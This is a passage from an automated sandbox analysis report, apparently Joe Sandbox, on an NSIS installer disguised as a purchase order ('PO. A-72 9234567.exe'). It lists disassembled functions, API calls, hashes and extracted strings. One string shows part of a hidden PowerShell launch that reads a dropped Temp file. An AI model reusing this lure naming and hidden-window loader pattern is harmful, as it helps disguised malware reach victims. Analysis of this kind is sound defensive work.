                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\PO. A-72 9234567.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-4178548483
                                                • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D
                                                Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 397 403135-40314c 395->397 402 403225-403228 396->402 403 403278-40327d 396->403 399 403150-403159 call 4034be 397->399 400 40314e 397->400 409 40327f-403287 call 40303e 399->409 410 40315f-403166 399->410 400->399 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 413 4031e2-4031e6 410->413 414 403168-40317c call 405fec 410->414 418 4031f0-4031f6 413->418 419 4031e8-4031ef call 40303e 413->419 414->418 432 40317e-403185 414->432 425 403205-40320d 418->425 426 4031f8-403202 call 406a22 418->426 419->418 425->397 433 403213 425->433 426->425 429->403 429->406 432->418 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->418 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 405fec 439->441 440->418 442 403199-4031a0 440->442 445 4032d0 441->445 442->418 444 4031a2-4031c2 442->444 444->403 446 4031c8-4031cc 444->446 445->388 447 4031d4-4031dc 446->447 448 4031ce-4031d2 446->448 447->418 449 4031de-4031e0 447->449 448->433 448->447 449->418
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004030B3
                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                  • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                  • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                Strings
                                                • Error launching installer, xrefs: 004030F2
                                                • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                • soft, xrefs: 00403190
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                                • Null, xrefs: 00403199
                                                • "C:\Users\user\Desktop\PO. A-72 9234567.exe", xrefs: 004030A8
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                • Inst, xrefs: 00403187
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\PO. A-72 9234567.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-423990427
                                                • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
                                                Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 456 4067d0-4067dd 453->456 457 4065d8-4065e5 453->457 454->453 455 4065cc-4065d3 454->455 455->453 459 4067e9-4067ec 456->459 460 4067df-4067e4 call 406541 456->460 457->456 458 4065eb-4065f4 457->458 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 488 406783-406789 472->488 473->488 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 489 406738-40673b 481->489 484 4066c0-4066c4 482->484 485 4066b0-4066bc GetWindowsDirectoryW 482->485 484->489 490 4066c6-4066e4 484->490 485->484 488->476 493 40678b 488->493 489->492 494 40674d-406753 call 4067ef 489->494 497 4066e6-4066ec 490->497 498 4066f8-406710 call 406935 490->498 491->489 492->494 495 406742-406748 lstrcatW 492->495 493->494 494->476 495->494 503 4066f4-4066f6 497->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 498->507 508 406727-406730 498->508 503->498 505 406732-406736 503->505 505->489 507->505 507->508 508->490 508->505
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\re
                                                • API String ID: 4024019347-2855935140
                                                • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                                Function 00401794 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 509 401794-4017b9 call 402dcb call 405e87 514 4017c3-4017d5 call 406541 call 405e10 lstrcatW 509->514 515 4017bb-4017c1 call 406541 509->515 520 4017da-4017db call 4067ef 514->520 515->520 524 4017e0-4017e4 520->524 525 4017e6-4017f0 call 40689e 524->525 526 401817-40181a 524->526 533 401802-401814 525->533 534 4017f2-401800 CompareFileTime 525->534 528 401822-40183e call 406031 526->528 529 40181c-40181d call 40600c 526->529 536 401840-401843 528->536 537 4018b2-4018db call 4055c6 call 4032d9 528->537 529->528 533->526 534->533 538 401894-40189e call 4055c6 536->538 539 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 536->539 549 4018e3-4018ef SetFileTime 537->549 550 4018dd-4018e1 537->550 551 4018a7-4018ad 538->551 539->524 571 401889-40188a 539->571 554 4018f5-401900 CloseHandle 549->554 550->549 550->554 555 402c58 551->555 557 401906-401909 554->557 558 402c4f-402c52 554->558 559 402c5a-402c5e 555->559 561 40190b-40191c call 40657e lstrcatW 557->561 562 40191e-401921 call 40657e 557->562 558->555 568 401926-4023c7 call 405ba1 561->568 562->568 568->559 575 402953-40295a 568->575 571->551 573 40188c-40188d 571->573 573->538 575->558
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels,?,?,00000031), ref: 004017D5
                                                • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels,?,?,00000031), ref: 004017FA
                                                  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                  • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                  • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: 32079$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels$hadefuldeste\optjeningers\hottish
                                                • API String ID: 1941528284-3433475906
                                                • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                                Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 582 405626-40562a 580->582 583 40560b-40561b lstrlenW 580->583 585 405639-40563d 582->585 586 40562c-405633 SetWindowTextW 582->586 583->578 584 40561d-405621 lstrcatW 583->584 584->582 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                                APIs
                                                • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: daniglacial
                                                • API String ID: 2531174081-766043870
                                                • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                                Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 603 40333a-40335a GetTickCount call 406a90 600->603 604 40345e-403460 600->604 602 403477-403478 601->602 605 4034b7-4034bb 602->605 616 4034b4 603->616 618 403360-403368 603->618 606 403462-403465 604->606 607 4034a9-4034ad 604->607 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 623 4034b1 610->623 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 623->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->602 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->602 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 650 403412 641->650 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 649 40343e-403442 646->649 651 403429-40342b 647->651 649->630 652 403448 649->652 650->638 651->634 653 40342d-403430 651->653 652->616 653->649
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 551687249-2449383134
                                                • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                                Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                • wsprintfW.USER32 ref: 00406917
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME
                                                • API String ID: 2200240437-1106614640
                                                • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                                Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040607E
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
